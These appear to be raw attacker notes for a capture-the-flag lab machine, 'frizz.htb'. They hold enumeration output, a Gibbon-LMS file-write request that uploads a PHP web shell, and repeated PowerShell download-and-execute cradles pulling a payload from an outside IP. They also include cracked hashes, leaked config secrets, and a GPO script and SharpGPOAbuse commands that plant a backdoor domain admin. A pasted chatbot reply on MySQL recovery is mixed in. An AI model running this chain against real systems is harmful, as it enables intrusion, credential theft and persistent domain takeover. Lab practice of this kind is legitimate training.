10.129.187.152 http://frizzdc.frizz.htb
Enumeration
sudo nmap -sC -sV -oA 10.129.187.152 10.129.187.152 -Pn
PORT STATE SERVICE VERSION
22/tcp open ssh OpenSSH for_Windows_9.5 (protocol 2.0)
53/tcp open domain?
| fingerprint-strings:
| DNSVersionBindReqTCP:
| version
|_ bind
80/tcp open http Apache httpd 2.4.58 (OpenSSL/3.1.3 PHP/8.2.12)
|_http-server-header: Apache/2.4.58 (Win64) OpenSSL/3.1.3 PHP/8.2.12
|_http-title: Did not follow redirect to http://frizzdc.frizz.htb/home/
88/tcp open kerberos-sec Microsoft Windows Kerberos (server time: 2025-03-16 02:06:27Z)
135/tcp open msrpc Microsoft Windows RPC
139/tcp open netbios-ssn Microsoft Windows netbios-ssn
389/tcp open ldap Microsoft Windows Active Directory LDAP (Domain: frizz.htb0., Site: Default-First-Site-Name)
445/tcp open microsoft-ds?
464/tcp open kpasswd5?
593/tcp open ncacn_http Microsoft Windows RPC over HTTP 1.0
636/tcp open tcpwrapped
3268/tcp open ldap Microsoft Windows Active Directory LDAP (Domain: frizz.htb0., Site: Default-First-Site-Name)
3269/tcp open tcpwrapped
fiona
fiona.frizzle
wanda
ross
ross.parker
ralphie
http://frizzdc.frizz.htb/Gibbon-LMS/?q=gibbon.sql
curl -X POST "http://frizzdc.frizz.htb/Gibbon-LMS/modules/Rubrics/rubrics_visualise_saveAjax.php" \
-H "Host: frizzdc.frizz.htb" \
--data-urlencode "img=image/png;asdf,PD9waHAgZWNobyBzeXN0ZW0oJF9HRVRbJ2NtZCddKTsgPz4K" \
--data-urlencode "path=shell.php" \
--data-urlencode "gibbonPersonID=0000000001"
./automation.sh
http://frizzdc.frizz.htb/Gibbon-LMS/shell.php?cmd=powershell%20%22IEX%20(New-Object%20System.Net.WebClient).DownloadString(%27http://10.10.14.93/sharp.ps1%27)%22
$databaseServer = 'localhost';
$databaseUsername = 'MrGibbonsDB';
$databasePassword = 'MisterGibbs!Parrot!?1';
$databaseName = 'gibbon';
That makes sense! Based on what worked for you, here’s a revised, precise step-by-step guide to follow in the future when restoring MySQL tables using .sql, .frm, and .ibd files.
MySQL Table Recovery from .frm, .ibd, and .sql Dump
Scenario:
- You have a MySQL dump (`gibbon.sql`) and additional `.frm` and `.ibd` files.
- You need to import the database and restore a missing table (e.g., `gibbonPerson`).
Step 1: Create and Import the Database from SQL Dump
- Open MySQL:
  `sudo mysql`
- Create the database:
  `CREATE DATABASE gibbon_recovered;`
  `exit;`
- Import the `.sql` dump:
  `sudo mysql gibbon_recovered < gibbon.sql`
- Verify tables are imported:
  `sudo mysql -e "USE gibbon_recovered; SHOW TABLES;"`
Step 2: Copy Missing Table’s .frm & .ibd Files
- Copy the `.frm` and `.ibd` files to the MySQL data directory:
  `sudo cp gibbonperson.frm /var/lib/mysql/gibbon_recovered/`
  `sudo cp gibbonperson.ibd /var/lib/mysql/gibbon_recovered/`
- Fix file ownership:
  `sudo chown mysql:mysql /var/lib/mysql/gibbon_recovered/gibbonperson.*`
  `sudo chown mysql:mysql /var/lib/mysql/gibbon_recovered/gibbonperson.ibd`
  `sudo chown mysql:mysql /var/lib/mysql/gibbon_recovered/gibbonperson.frm`
Step 3: Rename Files If Case Sensitivity Causes Issues
- Check existing tables in MySQL:
  `sudo mysql -e "USE gibbon_recovered; SHOW TABLES;"`
- If MySQL expects `gibbonPerson` but the files are named `gibbonperson`, rename them:
  `sudo mv /var/lib/mysql/gibbon_recovered/gibbonperson.frm /var/lib/mysql/gibbon_recovered/gibbonPerson.frm`
  `sudo mv /var/lib/mysql/gibbon_recovered/gibbonperson.ibd /var/lib/mysql/gibbon_recovered/gibbonPerson.ibd`
- Fix ownership:
  `sudo chown mysql:mysql /var/lib/mysql/gibbon_recovered/gibbonPerson.*`
  `sudo chown mysql:mysql /var/lib/mysql/gibbon_recovered/gibbonPerson.ibd`
  `sudo chown mysql:mysql /var/lib/mysql/gibbon_recovered/gibbonPerson.frm`
Step 4: Restart MySQL & Verify the Table
- Restart MySQL to apply changes:
  `sudo systemctl restart mysql`
- Open MySQL and check the table:
  `sudo mysql`
  `USE gibbon_recovered;`
  `ALTER TABLE gibbonPerson DISCARD TABLESPACE;`
  `ALTER TABLE gibbonPerson IMPORT TABLESPACE;`
  `SELECT * FROM gibbonPerson LIMIT 10;`
  Note: on InnoDB, `DISCARD TABLESPACE` deletes the table's current `.ibd` file, so if `IMPORT TABLESPACE` then reports the file as missing, copy `gibbonPerson.ibd` back into the data directory (with `mysql:mysql` ownership) before re-running the import.
hashcat -m 1420 -O hash.txt /usr/share/seclists/rockyou.txt
067f746faca44f170c6cd9d7c4bdac6bc342c608687733f80ff784242b0b0c03:/aACFhikmNopqrRTVz2489:Jenni_Luvs_Magic23
f.frizzle@frizz.htb
Jenni_Luvs_Magic23
getTGT.py -dc-ip 10.129.187.152 frizz.htb/f.frizzle
make-token -d frizz.htb -u f.frizzle -p Jenni_Luvs_Magic23 -T LOGON_NETWORK
execute -o cmd /c "powershell IEX (New-Object System.Net.WebClient).DownloadString('http://10.10.14.93/sharp.ps1')"
kinit f.frizzle@frizz.htb
kvno HOST/frizzdc
kvno CIFS/frizzdc
ssh -K f.frizzle@frizz.htb@frizzdc.frizz.htb
Accessed Modified Path
2024-10-29 2024-10-29 C:\Users\All Users\ssh\ssh_host_rsa_key
2024-10-29 2024-10-29 C:\Users\All Users\ssh\ssh_host_rsa_key.pub
scp -o GSSAPIAuthentication=yes f.frizzle@frizzdc.frizz.htb:/C:/Users/f.frizzle/test.7z ~/Downloads/
[options]
allow_unauthenticated_registration = True
wads_enable = True
login_on_wads = True
waptwua_enable = True
secret_key = ylPYfn9tTU9IDu9yssP2luKhjQijHKvtuxIzX9aWhPyYKtRO7tMSq5sEurdTwADJ
server_uuid = 646d0847-f8b8-41c3-95bc-51873ec9ae38
token_secret_key = 5jEKVoXmYLSpi5F7plGPB4zII5fpx0cYhGKX5QC0f7dkYpYmkeTXiFlhEJtZwuwD
wapt_password = IXN1QmNpZ0BNZWhUZWQhUgo=
clients_signing_key = C:\wapt\conf\ca-192.168.120.158.pem
clients_signing_certificate = C:\wapt\conf\ca-192.168.120.158.crt
[tftpserver]
root_dir = c:\wapt\waptserver\repository\wads\pxe
log_path = c:\wapt\log
netexec smb frizzdc.frizz.htb -u users.txt -p '!suBcig@MehTed!R' -k
!suBcig@MehTed!R
M.SchoolBus
powershell "IEX (New-Object System.Net.WebClient).DownloadString('http://10.10.14.93/sharp.ps1')"
PS C:\Users\Administrator> $GPOName = "Add Local Admin"
PS C:\Users\Administrator> New-GPO -Name $GPOName -Comment "Creates a local admin via GPO Preferences"
DisplayName : Add Local Admin
DomainName : frizz.htb
Owner : frizz\M.SchoolBus
Id : 8c481779-aae2-43ba-bf74-1e81b5754d86
GpoStatus : AllSettingsEnabled
Description : Creates a local admin via GPO Preferences
CreationTime : 3/16/2025 3:43:04 AM
ModificationTime : 3/16/2025 3:43:04 AM
UserVersion :
ComputerVersion :
WmiFilter :
# Walkthrough artifact (attacker side) from these notes: creates a domain GPO and writes a Group Policy
# Preferences groups.xml into SYSVOL so that machines applying the GPO create a local user and add it to
# the built-in Administrators group. The script never links the GPO to an OU or domain, so by itself
# nothing applies it.
# Defender notes: the "cpassword" written below is not protected (see the comment at $EncryptedPass), and
# GPP credentials in SYSVOL are readable by any authenticated domain user (MS14-025). GPO creation and
# writes to \\<domain>\SYSVOL\<domain>\Policies\{<id>}\Machine\Preferences\Groups\groups.xml are
# high-signal events worth auditing, as are the repadmin/gpupdate calls at the end.
# Define Variables
$DomainName = "frizz.htb" # Manually set domain
$GPOName = "Emergency_Local_Access"
$UserName = "BackdoorAdmin"
$Password = "SuperSecurePass123"
# Create the GPO
# New-GPO requires GPO-creation rights in the domain; $NewGPO holds the returned GPO object.
$NewGPO = New-GPO -Name $GPOName -Comment "Creates an emergency local admin via GPO Preferences"
# Extract GPO ID
$GPO_ID = $NewGPO.Id
Write-Host "[+] Extracted GPO ID: $GPO_ID"
# Define SYSVOL Path
# Machine-side preferences path; the braces around $GPO_ID are part of the on-disk folder name.
$GPOPath = "\\$DomainName\SYSVOL\$DomainName\Policies\{$GPO_ID}\Machine\Preferences\Groups"
# Create Directory
Write-Host "[+] Creating directory: $GPOPath"
New-Item -ItemType Directory -Path $GPOPath -Force | Out-Null
# Encrypt Password
# NOTE(review): despite the name, this is only base64 of the UTF-16LE bytes of $Password — no
# encryption is applied, so the resulting groups.xml effectively contains a plaintext credential.
$EncryptedPass = [System.Convert]::ToBase64String([System.Text.Encoding]::Unicode.GetBytes($Password))
# Create XML for User
# Here-string below is the GPP Local Users and Groups XML: a <User> element creating $UserName and a
# <Group> element adding it to Administrators (S-1-5-32-544 is the well-known BUILTIN\Administrators SID).
# userFlags="512" is presumably the NORMAL_ACCOUNT flag value — confirm against the GPP schema.
$UserXML = @"
<Groups clsid="{3125E3B7-5830-47C8-9271-FD5A85046B29}">
<User name="$UserName" action="C" description="Emergency Local Admin">
<Properties description="Emergency Local Admin User"
fullName="ITSupport"
userName="$UserName"
action="U"
cpassword="$EncryptedPass"
noChange="0"
neverExpires="1"
acctDisabled="0"
userFlags="512"/>
<Filters/>
</User>
<Group name="Administrators (built-in)" action="U">
<Properties groupName="Administrators (built-in)"
action="U"
newName=""
deleteAllUsers="0"/>
<Members>
<Member name="$UserName" action="ADD" sid="S-1-5-32-544"/>
</Members>
</Group>
</Groups>
"@
# Write to SYSVOL
Set-Content -Path "$GPOPath\groups.xml" -Value $UserXML -Encoding UTF8
Write-Host "[+] User '$UserName' added to GPO '$GPOName' in SYSVOL!"
# Force replication
# Both commands are noisy: repadmin needs replication rights and gpupdate only refreshes the local host.
repadmin /syncall /AdeP
gpupdate /force
Write-Host "[+] Successfully created GPO '$GPOName' and applied policy!"
python3 pygpoabuse.py 'frizz.htb/M.Schoolbus' -p '!suBcig@MehTed!R' -gpo-id "6ACCD7CA-C2A9-4212-8DDE-2ED58DF7610B" -f
New-GPO -Name "AbusedGPO"
New-GPLink -Name "AbusedGPO" -Target "OU=Domain Controllers,DC=frizz,DC=htb"
.\SharpGPOAbuse.exe --AddUserTask --GPOName "AbusedGPO" --TaskName "BackdoorTask" --Author "FRIZZ.HTB\M.SchoolBus" --Command "cmd.exe" --Arguments "/c net localgroup administrators M.SchoolBus /add"
.\SharpGPOAbuse.exe --AddLocalAdmin --GPOName "AbusedGPO" --UserAccount "M.SchoolBus"